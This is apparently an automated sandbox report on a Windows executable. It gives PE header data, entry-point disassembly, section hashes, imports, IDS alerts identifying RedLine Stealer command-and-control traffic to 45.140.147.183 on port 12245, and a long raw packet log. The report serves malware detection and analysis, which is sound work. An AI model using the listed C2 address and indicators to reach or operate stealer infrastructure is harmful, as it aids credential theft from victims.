                        Subsystem:windows gui
                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                        Time Stamp:0x63ECF218 [Wed Feb 15 14:54:16 2023 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:
                        OS Version Major:6
                        OS Version Minor:1
                        File Version Major:6
                        File Version Minor:1
                        Subsystem Version Major:6
                        Subsystem Version Minor:1
                        Import Hash:e569e6f445d32ba23766ad67d1e3787f
                        Instruction
                        push ebp
                        mov ebp, esp
                        add esp, FFFFFFA4h
                        push ebx
                        push esi
                        push edi
                        xor eax, eax
                        mov dword ptr [ebp-3Ch], eax
                        mov dword ptr [ebp-40h], eax
                        mov dword ptr [ebp-5Ch], eax
                        mov dword ptr [ebp-30h], eax
                        mov dword ptr [ebp-38h], eax
                        mov dword ptr [ebp-34h], eax
                        mov dword ptr [ebp-2Ch], eax
                        mov dword ptr [ebp-28h], eax
                        mov dword ptr [ebp-14h], eax
                        mov eax, 004B14B8h
                        call 00007FAB8D177C05h
                        xor eax, eax
                        push ebp
                        push 004B65E2h
                        push dword ptr fs:[eax]
                        mov dword ptr fs:[eax], esp
                        xor edx, edx
                        push ebp
                        push 004B659Eh
                        push dword ptr fs:[edx]
                        mov dword ptr fs:[edx], esp
                        mov eax, dword ptr [004BE634h]
                        call 00007FAB8D21A6F7h
                        call 00007FAB8D21A24Ah
                        lea edx, dword ptr [ebp-14h]
                        xor eax, eax
                        call 00007FAB8D18D6A4h
                        mov edx, dword ptr [ebp-14h]
                        mov eax, 004C1D84h
                        call 00007FAB8D1727F7h
                        push 00000002h
                        push 00000000h
                        push 00000001h
                        mov ecx, dword ptr [004C1D84h]
                        mov dl, 01h
                        mov eax, dword ptr [004238ECh]
                        call 00007FAB8D18E827h
                        mov dword ptr [004C1D88h], eax
                        xor edx, edx
                        push ebp
                        push 004B654Ah
                        push dword ptr fs:[edx]
                        mov dword ptr fs:[edx], esp
                        call 00007FAB8D21A77Fh
                        mov dword ptr [004C1D90h], eax
                        mov eax, dword ptr [004C1D90h]
                        cmp dword ptr [eax+0Ch], 01h
                        jne 00007FAB8D22099Ah
                        mov eax, dword ptr [004C1D90h]
                        mov edx, 00000028h
                        call 00007FAB8D18F11Ch
                        mov edx, dword ptr [004C1D90h]
                         Name | Virtual Address | Virtual Size | Is in Section
                         IMAGE_DIRECTORY_ENTRY_EXPORT | 0xc4000 | 0x9a | .edata
                         IMAGE_DIRECTORY_ENTRY_IMPORT | 0xc2000 | 0xfdc | .idata
                         IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc7000 | 0x46bc | .rsrc
                         IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                         IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                         IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                         IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                         IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                         IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                         IMAGE_DIRECTORY_ENTRY_TLS | 0xc6000 | 0x18 | .rdata
                         IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                         IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                         IMAGE_DIRECTORY_ENTRY_IAT | 0xc22f4 | 0x254 | .idata
                         IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0xc3000 | 0x1a4 | .didata
                         IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                         IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                         Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                         .text | 0x1000 | 0xb39e4 | 0xb3a00 | 43af0a9476ca224d8e8461f1e22c94da | False | 0.34525867693110646 | data | 6.357635049994181 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                         .itext | 0xb5000 | 0x1688 | 0x1800 | 185e04b9a1f554e31f7f848515dc890c | False | 0.54443359375 | data | 5.971425428435973 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                         .data | 0xb7000 | 0x37a4 | 0x3800 | cab2107c933b696aa5cf0cc6c3fd3980 | False | 0.36097935267857145 | data | 5.048648594372454 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                         .bss | 0xbb000 | 0x6de8 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                         .idata | 0xc2000 | 0xfdc | 0x1000 | e7d1635e2624b124cfdce6c360ac21cd | False | 0.3798828125 | data | 5.029087481102678 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                         .didata | 0xc3000 | 0x1a4 | 0x200 | 8ced971d8a7705c98b173e255d8c9aa7 | False | 0.345703125 | data | 2.7509822285969876 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                         .edata | 0xc4000 | 0x9a | 0x200 | 8d4e1e508031afe235bf121c80fd7d5f | False | 0.2578125 | data | 1.877162954504408 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                         .tls | 0xc5000 | 0x18 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                         .rdata | 0xc6000 | 0x5d | 0x200 | 8f2f090acd9622c88a6a852e72f94e96 | False | 0.189453125 | data | 1.3838943752217987 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                         .rsrc | 0xc7000 | 0x46bc | 0x4800 | 6fe8c88e8ef5c49e9b5936d069ae6779 | False | 0.3133680555555556 | data | 4.550262803440723 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                         Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                         RT_ICON | 0xc74c8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | United States | 0.5675675675675675
                         RT_ICON | 0xc75f0 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 320 | English | United States | 0.4486994219653179
                         RT_ICON | 0xc7b58 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 640 | English | United States | 0.4637096774193548
                         RT_ICON | 0xc7e40 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1152 | English | United States | 0.3935018050541516
                         RT_STRING | 0xc86e8 | 0x360 | data | | | 0.34375
                         RT_STRING | 0xc8a48 | 0x260 | data | | | 0.3256578947368421
                         RT_STRING | 0xc8ca8 | 0x45c | data | | | 0.4068100358422939
                         RT_STRING | 0xc9104 | 0x40c | data | | | 0.3754826254826255
                         RT_STRING | 0xc9510 | 0x2d4 | data | | | 0.39226519337016574
                         RT_STRING | 0xc97e4 | 0xb8 | data | | | 0.6467391304347826
                         RT_STRING | 0xc989c | 0x9c | data | | | 0.6410256410256411
                         RT_STRING | 0xc9938 | 0x374 | data | | | 0.4230769230769231
                         RT_STRING | 0xc9cac | 0x398 | data | | | 0.3358695652173913
                         RT_STRING | 0xca044 | 0x368 | data | | | 0.3795871559633027
                         RT_STRING | 0xca3ac | 0x2a4 | data | | | 0.4275147928994083
                         RT_RCDATA | 0xca650 | 0x10 | data | | | 1.5
                         RT_RCDATA | 0xca660 | 0x2c4 | data | | | 0.6384180790960452
                         RT_RCDATA | 0xca924 | 0x2c | data | | | 1.1818181818181819
                         RT_GROUP_ICON | 0xca950 | 0x3e | data | English | United States | 0.8870967741935484
                         RT_VERSION | 0xca990 | 0x584 | data | English | United States | 0.2839943342776204
                         RT_MANIFEST | 0xcaf14 | 0x7a8 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.3377551020408163
                         DLL | Import
                         kernel32.dll | GetACP, GetExitCodeProcess, LocalFree, CloseHandle, SizeofResource, VirtualProtect, VirtualFree, GetFullPathNameW, ExitProcess, HeapAlloc, GetCPInfoExW, RtlUnwind, GetCPInfo, GetStdHandle, GetModuleHandleW, FreeLibrary, HeapDestroy, ReadFile, CreateProcessW, GetLastError, GetModuleFileNameW, SetLastError, FindResourceW, CreateThread, CompareStringW, LoadLibraryA, ResetEvent, GetVersion, RaiseException, FormatMessageW, SwitchToThread, GetExitCodeThread, GetCurrentThread, LoadLibraryExW, LockResource, GetCurrentThreadId, UnhandledExceptionFilter, VirtualQuery, VirtualQueryEx, Sleep, EnterCriticalSection, SetFilePointer, LoadResource, SuspendThread, GetTickCount, GetFileSize, GetStartupInfoW, GetFileAttributesW, InitializeCriticalSection, GetSystemWindowsDirectoryW, GetThreadPriority, SetThreadPriority, GetCurrentProcess, VirtualAlloc, GetSystemInfo, GetCommandLineW, LeaveCriticalSection, GetProcAddress, ResumeThread, GetVersionExW, VerifyVersionInfoW, HeapCreate, GetWindowsDirectoryW, VerSetConditionMask, GetDiskFreeSpaceW, FindFirstFileW, GetUserDefaultUILanguage, lstrlenW, QueryPerformanceCounter, SetEndOfFile, HeapFree, WideCharToMultiByte, FindClose, MultiByteToWideChar, LoadLibraryW, SetEvent, CreateFileW, GetLocaleInfoW, GetSystemDirectoryW, DeleteFileW, GetLocalTime, GetEnvironmentVariableW, WaitForSingleObject, WriteFile, ExitThread, DeleteCriticalSection, TlsGetValue, GetDateFormatW, SetErrorMode, IsValidLocale, TlsSetValue, CreateDirectoryW, GetSystemDefaultUILanguage, EnumCalendarInfoW, LocalAlloc, GetUserDefaultLangID, RemoveDirectoryW, CreateEventW, SetThreadLocale, GetThreadLocale
                         comctl32.dll | InitCommonControls
                         version.dll | GetFileVersionInfoSizeW, VerQueryValueW, GetFileVersionInfoW
                         user32.dll | CreateWindowExW, TranslateMessage, CharLowerBuffW, CallWindowProcW, CharUpperW, PeekMessageW, GetSystemMetrics, SetWindowLongW, MessageBoxW, DestroyWindow, CharUpperBuffW, CharNextW, MsgWaitForMultipleObjects, LoadStringW, ExitWindowsEx, DispatchMessageW
                         oleaut32.dll | SysAllocStringLen, SafeArrayPtrOfIndex, VariantCopy, SafeArrayGetLBound, SafeArrayGetUBound, VariantInit, VariantClear, SysFreeString, SysReAllocStringLen, VariantChangeType, SafeArrayCreate
                         netapi32.dll | NetWkstaGetInfo, NetApiBufferFree
                         advapi32.dll | ConvertStringSecurityDescriptorToSecurityDescriptorW, RegQueryValueExW, AdjustTokenPrivileges, GetTokenInformation, ConvertSidToStringSidW, LookupPrivilegeValueW, RegCloseKey, OpenProcessToken, RegOpenKeyExW
                         Name | Ordinal | Address
                         TMethodImplementationIntercept | 3 | 0x4541a8
                         __dbk_fcall_wrapper | 2 | 0x40d0a0
                         dbkFCallWrapperAddr | 1 | 0x4be63c
                         Language of compilation system | Country where language is spoken | Map
                         English | United States |
                         Timestamp | Protocol | SID | Signature | Source Port | Dest Port | Source IP | Dest IP
                         2024-07-26T21:22:07.690591+0200 | TCP | 2046045 | ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization) | 49737 | 12245 | 192.168.2.4 | 45.140.147.183
                         2024-07-26T21:22:17.446338+0200 | TCP | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 49737 | 12245 | 192.168.2.4 | 45.140.147.183
                         2024-07-26T21:22:18.812780+0200 | TCP | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 49737 | 12245 | 192.168.2.4 | 45.140.147.183
                         2024-07-26T21:21:18.052724+0200 | TCP | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 443 | 49730 | 40.68.123.157 | 192.168.2.4
                         2024-07-26T21:22:19.403291+0200 | TCP | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 49737 | 12245 | 192.168.2.4 | 45.140.147.183
                         2024-07-26T21:22:15.262237+0200 | TCP | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 49737 | 12245 | 192.168.2.4 | 45.140.147.183
                         2024-07-26T21:22:16.623754+0200 | TCP | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 49737 | 12245 | 192.168.2.4 | 45.140.147.183
                         2024-07-26T21:22:07.864694+0200 | TCP | 2043234 | ET MALWARE Redline Stealer TCP CnC - Id1Response | 12245 | 49737 | 45.140.147.183 | 192.168.2.4
                         2024-07-26T21:22:12.955942+0200 | TCP | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 49737 | 12245 | 192.168.2.4 | 45.140.147.183
                         2024-07-26T21:22:15.075974+0200 | TCP | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 49737 | 12245 | 192.168.2.4 | 45.140.147.183
                         2024-07-26T21:22:14.589006+0200 | TCP | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 49737 | 12245 | 192.168.2.4 | 45.140.147.183
                         2024-07-26T21:22:18.170910+0200 | TCP | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 49737 | 12245 | 192.168.2.4 | 45.140.147.183
                         2024-07-26T21:22:18.991924+0200 | TCP | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 49737 | 12245 | 192.168.2.4 | 45.140.147.183
                         2024-07-26T21:21:56.944528+0200 | TCP | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 443 | 49736 | 40.68.123.157 | 192.168.2.4
                         2024-07-26T21:22:14.582562+0200 | TCP | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 49737 | 12245 | 192.168.2.4 | 45.140.147.183
                         2024-07-26T21:22:17.937770+0200 | TCP | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 49737 | 12245 | 192.168.2.4 | 45.140.147.183
                         2024-07-26T21:22:18.347768+0200 | TCP | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 49737 | 12245 | 192.168.2.4 | 45.140.147.183
                         2024-07-26T21:22:15.615103+0200 | TCP | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 49737 | 12245 | 192.168.2.4 | 45.140.147.183
                         2024-07-26T21:22:16.262656+0200 | TCP | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 49737 | 12245 | 192.168.2.4 | 45.140.147.183
                         2024-07-26T21:22:13.136410+0200 | TCP | 2046056 | ET MALWARE Redline Stealer/MetaStealer Family Activity (Response) | 12245 | 49737 | 45.140.147.183 | 192.168.2.4
                         2024-07-26T21:22:14.307981+0200 | TCP | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 49737 | 12245 | 192.168.2.4 | 45.140.147.183
                         2024-07-26T21:22:16.629545+0200 | TCP | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 49737 | 12245 | 192.168.2.4 | 45.140.147.183
                         2024-07-26T21:22:19.621416+0200 | TCP | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 49737 | 12245 | 192.168.2.4 | 45.140.147.183
                         2024-07-26T21:22:13.968079+0200 | TCP | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 49737 | 12245 | 192.168.2.4 | 45.140.147.183
                         2024-07-26T21:22:13.409040+0200 | TCP | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 49737 | 12245 | 192.168.2.4 | 45.140.147.183
                         2024-07-26T21:22:18.635280+0200 | TCP | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 49737 | 12245 | 192.168.2.4 | 45.140.147.183
                         2024-07-26T21:22:19.165956+0200 | TCP | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 49737 | 12245 | 192.168.2.4 | 45.140.147.183
                         2024-07-26T21:22:16.561838+0200 | TCP | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 49737 | 12245 | 192.168.2.4 | 45.140.147.183
                         2024-07-26T21:22:15.440615+0200 | TCP | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 49737 | 12245 | 192.168.2.4 | 45.140.147.183
                         2024-07-26T21:22:13.666343+0200 | TCP | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 49737 | 12245 | 192.168.2.4 | 45.140.147.183
                         2024-07-26T21:22:17.624813+0200 | TCP | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 49737 | 12245 | 192.168.2.4 | 45.140.147.183
                         Timestamp | Source Port | Dest Port | Source IP | Dest IP
                         Jul 26, 2024 21:22:07.020245075 CEST | 49737 | 12245 | 192.168.2.4 | 45.140.147.183
                         Jul 26, 2024 21:22:07.025232077 CEST | 12245 | 49737 | 45.140.147.183 | 192.168.2.4
                         Jul 26, 2024 21:22:07.025461912 CEST | 49737 | 12245 | 192.168.2.4 | 45.140.147.183
                         Jul 26, 2024 21:22:07.036070108 CEST | 49737 | 12245 | 192.168.2.4 | 45.140.147.183
                         Jul 26, 2024 21:22:07.041055918 CEST | 12245 | 49737 | 45.140.147.183 | 192.168.2.4
                         Jul 26, 2024 21:22:07.634102106 CEST | 12245 | 49737 | 45.140.147.183 | 192.168.2.4
                         Jul 26, 2024 21:22:07.686836958 CEST | 49737 | 12245 | 192.168.2.4 | 45.140.147.183
                         Jul 26, 2024 21:22:07.690591097 CEST | 49737 | 12245 | 192.168.2.4 | 45.140.147.183
                         Jul 26, 2024 21:22:07.695411921 CEST | 12245 | 49737 | 45.140.147.183 | 192.168.2.4
                         Jul 26, 2024 21:22:07.864694118 CEST | 12245 | 49737 | 45.140.147.183 | 192.168.2.4
                         Jul 26, 2024 21:22:07.905564070 CEST | 49737 | 12245 | 192.168.2.4 | 45.140.147.183
                         Jul 26, 2024 21:22:12.955941916 CEST | 49737 | 12245 | 192.168.2.4 | 45.140.147.183
                         Jul 26, 2024 21:22:12.961088896 CEST | 12245 | 49737 | 45.140.147.183 | 192.168.2.4
                         Jul 26, 2024 21:22:13.135726929 CEST | 12245 | 49737 | 45.140.147.183 | 192.168.2.4
                         Jul 26, 2024 21:22:13.135792971 CEST | 12245 | 49737 | 45.140.147.183 | 192.168.2.4
                         Jul 26, 2024 21:22:13.135833025 CEST | 12245 | 49737 | 45.140.147.183 | 192.168.2.4
                         Jul 26, 2024 21:22:13.135973930 CEST | 49737 | 12245 | 192.168.2.4 | 45.140.147.183
                         Jul 26, 2024 21:22:13.136409998 CEST | 12245 | 49737 | 45.140.147.183 | 192.168.2.4
                         Jul 26, 2024 21:22:13.136451960 CEST | 12245 | 49737 | 45.140.147.183 | 192.168.2.4
                         Jul 26, 2024 21:22:13.136472940 CEST | 49737 | 12245 | 192.168.2.4 | 45.140.147.183
                         Jul 26, 2024 21:22:13.186965942 CEST | 49737 | 12245 | 192.168.2.4 | 45.140.147.183
                         Jul 26, 2024 21:22:13.409039974 CEST | 49737 | 12245 | 192.168.2.4 | 45.140.147.183
                         Jul 26, 2024 21:22:13.415415049 CEST | 12245 | 49737 | 45.140.147.183 | 192.168.2.4
                         Jul 26, 2024 21:22:13.586671114 CEST | 12245 | 49737 | 45.140.147.183 | 192.168.2.4
                         Jul 26, 2024 21:22:13.640002966 CEST | 49737 | 12245 | 192.168.2.4 | 45.140.147.183
                         Jul 26, 2024 21:22:13.666342974 CEST | 49737 | 12245 | 192.168.2.4 | 45.140.147.183
                         Jul 26, 2024 21:22:13.968079090 CEST | 49737 | 12245 | 192.168.2.4 | 45.140.147.183
                         Jul 26, 2024 21:22:14.003901005 CEST | 12245 | 49737 | 45.140.147.183 | 192.168.2.4
                         Jul 26, 2024 21:22:14.003992081 CEST | 49737 | 12245 | 192.168.2.4 | 45.140.147.183
                         Jul 26, 2024 21:22:14.008896112 CEST | 12245 | 49737 | 45.140.147.183 | 192.168.2.4
                         Jul 26, 2024 21:22:14.008915901 CEST | 12245 | 49737 | 45.140.147.183 | 192.168.2.4
                         Jul 26, 2024 21:22:14.299575090 CEST | 12245 | 49737 | 45.140.147.183 | 192.168.2.4
                         Jul 26, 2024 21:22:14.307981014 CEST | 49737 | 12245 | 192.168.2.4 | 45.140.147.183
                         Jul 26, 2024 21:22:14.314624071 CEST | 12245 | 49737 | 45.140.147.183 | 192.168.2.4
                         Jul 26, 2024 21:22:14.314673901 CEST | 49737 | 12245 | 192.168.2.4 | 45.140.147.183
                         Jul 26, 2024 21:22:14.319847107 CEST | 12245 | 49737 | 45.140.147.183 | 192.168.2.4
                         Jul 26, 2024 21:22:14.319890022 CEST | 49737 | 12245 | 192.168.2.4 | 45.140.147.183
                         Jul 26, 2024 21:22:14.320132017 CEST | 12245 | 49737 | 45.140.147.183 | 192.168.2.4
                         Jul 26, 2024 21:22:14.320166111 CEST | 49737 | 12245 | 192.168.2.4 | 45.140.147.183
                         Jul 26, 2024 21:22:14.325103045 CEST | 12245 | 49737 | 45.140.147.183 | 192.168.2.4
                         Jul 26, 2024 21:22:14.325226068 CEST | 12245 | 49737 | 45.140.147.183 | 192.168.2.4
                         Jul 26, 2024 21:22:14.325803041 CEST | 12245 | 49737 | 45.140.147.183 | 192.168.2.4
                         Jul 26, 2024 21:22:14.494699955 CEST | 12245 | 49737 | 45.140.147.183 | 192.168.2.4
                         Jul 26, 2024 21:22:14.546200037 CEST | 49737 | 12245 | 192.168.2.4 | 45.140.147.183
                         Jul 26, 2024 21:22:14.582561970 CEST | 49737 | 12245 | 192.168.2.4 | 45.140.147.183
                         Jul 26, 2024 21:22:14.588838100 CEST | 12245 | 49737 | 45.140.147.183 | 192.168.2.4
                         Jul 26, 2024 21:22:14.588896036 CEST | 49737 | 12245 | 192.168.2.4 | 45.140.147.183
                         Jul 26, 2024 21:22:14.588960886 CEST | 12245 | 49737 | 45.140.147.183 | 192.168.2.4
                         Jul 26, 2024 21:22:14.588969946 CEST | 12245 | 49737 | 45.140.147.183 | 192.168.2.4
                         Jul 26, 2024 21:22:14.588978052 CEST | 12245 | 49737 | 45.140.147.183 | 192.168.2.4
                         Jul 26, 2024 21:22:14.588985920 CEST | 12245 | 49737 | 45.140.147.183 | 192.168.2.4
                         Jul 26, 2024 21:22:14.588993073 CEST | 12245 | 49737 | 45.140.147.183 | 192.168.2.4
                         Jul 26, 2024 21:22:14.589005947 CEST | 49737 | 12245 | 192.168.2.4 | 45.140.147.183
                         Jul 26, 2024 21:22:14.589037895 CEST | 49737 | 12245 | 192.168.2.4 | 45.140.147.183
                         Jul 26, 2024 21:22:14.595391989 CEST | 12245 | 49737 | 45.140.147.183 | 192.168.2.4
                         Jul 26, 2024 21:22:14.595516920 CEST | 12245 | 49737 | 45.140.147.183 | 192.168.2.4
                         Jul 26, 2024 21:22:14.595520973 CEST | 12245 | 49737 | 45.140.147.183 | 192.168.2.4
                         Jul 26, 2024 21:22:14.595529079 CEST | 12245 | 49737 | 45.140.147.183 | 192.168.2.4
                         Jul 26, 2024 21:22:14.595531940 CEST | 12245 | 49737 | 45.140.147.183 | 192.168.2.4
                         Jul 26, 2024 21:22:14.595541000 CEST | 12245 | 49737 | 45.140.147.183 | 192.168.2.4
                         Jul 26, 2024 21:22:14.595549107 CEST | 12245 | 49737 | 45.140.147.183 | 192.168.2.4
                         Jul 26, 2024 21:22:14.595642090 CEST | 12245 | 49737 | 45.140.147.183 | 192.168.2.4
                         Jul 26, 2024 21:22:15.073215961 CEST | 12245 | 49737 | 45.140.147.183 | 192.168.2.4
                         Jul 26, 2024 21:22:15.075973988 CEST | 49737 | 12245 | 192.168.2.4 | 45.140.147.183
                         Jul 26, 2024 21:22:15.081975937 CEST | 12245 | 49737 | 45.140.147.183 | 192.168.2.4
                         Jul 26, 2024 21:22:15.251935005 CEST | 12245 | 49737 | 45.140.147.183 | 192.168.2.4
                         Jul 26, 2024 21:22:15.262237072 CEST | 49737 | 12245 | 192.168.2.4 | 45.140.147.183
                         Jul 26, 2024 21:22:15.267633915 CEST | 12245 | 49737 | 45.140.147.183 | 192.168.2.4
                         Jul 26, 2024 21:22:15.436948061 CEST | 12245 | 49737 | 45.140.147.183 | 192.168.2.4
                         Jul 26, 2024 21:22:15.440614939 CEST | 49737 | 12245 | 192.168.2.4 | 45.140.147.183
                         Jul 26, 2024 21:22:15.446326971 CEST | 12245 | 49737 | 45.140.147.183 | 192.168.2.4
                         Jul 26, 2024 21:22:15.614187002 CEST | 12245 | 49737 | 45.140.147.183 | 192.168.2.4
                         Jul 26, 2024 21:22:15.615103006 CEST | 49737 | 12245 | 192.168.2.4 | 45.140.147.183
                         Jul 26, 2024 21:22:15.620886087 CEST | 12245 | 49737 | 45.140.147.183 | 192.168.2.4
                         Jul 26, 2024 21:22:15.788964033 CEST | 12245 | 49737 | 45.140.147.183 | 192.168.2.4
                         Jul 26, 2024 21:22:15.843168020 CEST | 49737 | 12245 | 192.168.2.4 | 45.140.147.183
                         Jul 26, 2024 21:22:16.262655973 CEST | 49737 | 12245 | 192.168.2.4 | 45.140.147.183
                         Jul 26, 2024 21:22:16.267719984 CEST | 12245 | 49737 | 45.140.147.183 | 192.168.2.4
                         Jul 26, 2024 21:22:16.267730951 CEST | 12245 | 49737 | 45.140.147.183 | 192.168.2.4
                         Jul 26, 2024 21:22:16.267740011 CEST | 12245 | 49737 | 45.140.147.183 | 192.168.2.4
                         Jul 26, 2024 21:22:16.517076969 CEST | 12245 | 49737 | 45.140.147.183 | 192.168.2.4
                         Jul 26, 2024 21:22:16.561837912 CEST | 49737 | 12245 | 192.168.2.4 | 45.140.147.183
                         Jul 26, 2024 21:22:16.623754025 CEST | 49737 | 12245 | 192.168.2.4 | 45.140.147.183
                         Jul 26, 2024 21:22:16.628856897 CEST | 12245 | 49737 | 45.140.147.183 | 192.168.2.4
                         Jul 26, 2024 21:22:16.628868103 CEST | 12245 | 49737 | 45.140.147.183 | 192.168.2.4
                         Jul 26, 2024 21:22:16.628911972 CEST | 49737 | 12245 | 192.168.2.4 | 45.140.147.183
                         Jul 26, 2024 21:22:16.629487038 CEST | 12245 | 49737 | 45.140.147.183 | 192.168.2.4
                         Jul 26, 2024 21:22:16.629494905 CEST | 12245 | 49737 | 45.140.147.183 | 192.168.2.4
                         Jul 26, 2024 21:22:16.629498005 CEST | 12245 | 49737 | 45.140.147.183 | 192.168.2.4
                         Jul 26, 2024 21:22:16.629504919 CEST | 12245 | 49737 | 45.140.147.183 | 192.168.2.4
                         Jul 26, 2024 21:22:16.629518032 CEST | 12245 | 49737 | 45.140.147.183 | 192.168.2.4
                         Jul 26, 2024 21:22:16.629529953 CEST | 12245 | 49737 | 45.140.147.183 | 192.168.2.4
                         Jul 26, 2024 21:22:16.629544020 CEST | 12245 | 49737 | 45.140.147.183 | 192.168.2.4
                         Jul 26, 2024 21:22:16.629544973 CEST | 49737 | 12245 | 192.168.2.4 | 45.140.147.183
                         Jul 26, 2024 21:22:16.629544973 CEST | 49737 | 12245 | 192.168.2.4 | 45.140.147.183
                         Jul 26, 2024 21:22:16.629570007 CEST | 49737 | 12245 | 192.168.2.4 | 45.140.147.183
                         Jul 26, 2024 21:22:16.629589081 CEST | 49737 | 12245 | 192.168.2.4 | 45.140.147.183
                         Jul 26, 2024 21:22:16.629595041 CEST | 12245 | 49737 | 45.140.147.183 | 192.168.2.4
                         Jul 26, 2024 21:22:16.629604101 CEST | 12245 | 49737 | 45.140.147.183 | 192.168.2.4
                         Jul 26, 2024 21:22:16.629617929 CEST | 12245 | 49737 | 45.140.147.183 | 192.168.2.4
                         Jul 26, 2024 21:22:16.629643917 CEST | 12245 | 49737 | 45.140.147.183 | 192.168.2.4
                         Jul 26, 2024 21:22:16.629645109 CEST | 49737 | 12245 | 192.168.2.4 | 45.140.147.183
                         Jul 26, 2024 21:22:16.629652977 CEST | 12245 | 49737 | 45.140.147.183 | 192.168.2.4
                         Jul 26, 2024 21:22:16.629659891 CEST | 49737 | 12245 | 192.168.2.4 | 45.140.147.183
                         Jul 26, 2024 21:22:16.629683971 CEST | 12245 | 49737 | 45.140.147.183 | 192.168.2.4
                         Jul 26, 2024 21:22:16.629686117 CEST | 49737 | 12245 | 192.168.2.4 | 45.140.147.183
                         Jul 26, 2024 21:22:16.629692078 CEST | 12245 | 49737 | 45.140.147.183 | 192.168.2.4
                         Jul 26, 2024 21:22:16.629729986 CEST | 49737 | 12245 | 192.168.2.4 | 45.140.147.183
                         Jul 26, 2024 21:22:16.630477905 CEST | 12245 | 49737 | 45.140.147.183 | 192.168.2.4
                         Jul 26, 2024 21:22:16.630553007 CEST | 49737 | 12245 | 192.168.2.4 | 45.140.147.183
                         Jul 26, 2024 21:22:16.634517908 CEST | 12245 | 49737 | 45.140.147.183 | 192.168.2.4
                         Jul 26, 2024 21:22:16.634566069 CEST | 49737 | 12245 | 192.168.2.4 | 45.140.147.183
                         Jul 26, 2024 21:22:16.634578943 CEST | 12245 | 49737 | 45.140.147.183 | 192.168.2.4
                         Jul 26, 2024 21:22:16.634587049 CEST | 12245 | 49737 | 45.140.147.183 | 192.168.2.4
                         Jul 26, 2024 21:22:16.634617090 CEST | 12245 | 49737 | 45.140.147.183 | 192.168.2.4
                         Jul 26, 2024 21:22:16.634630919 CEST | 12245 | 49737 | 45.140.147.183 | 192.168.2.4
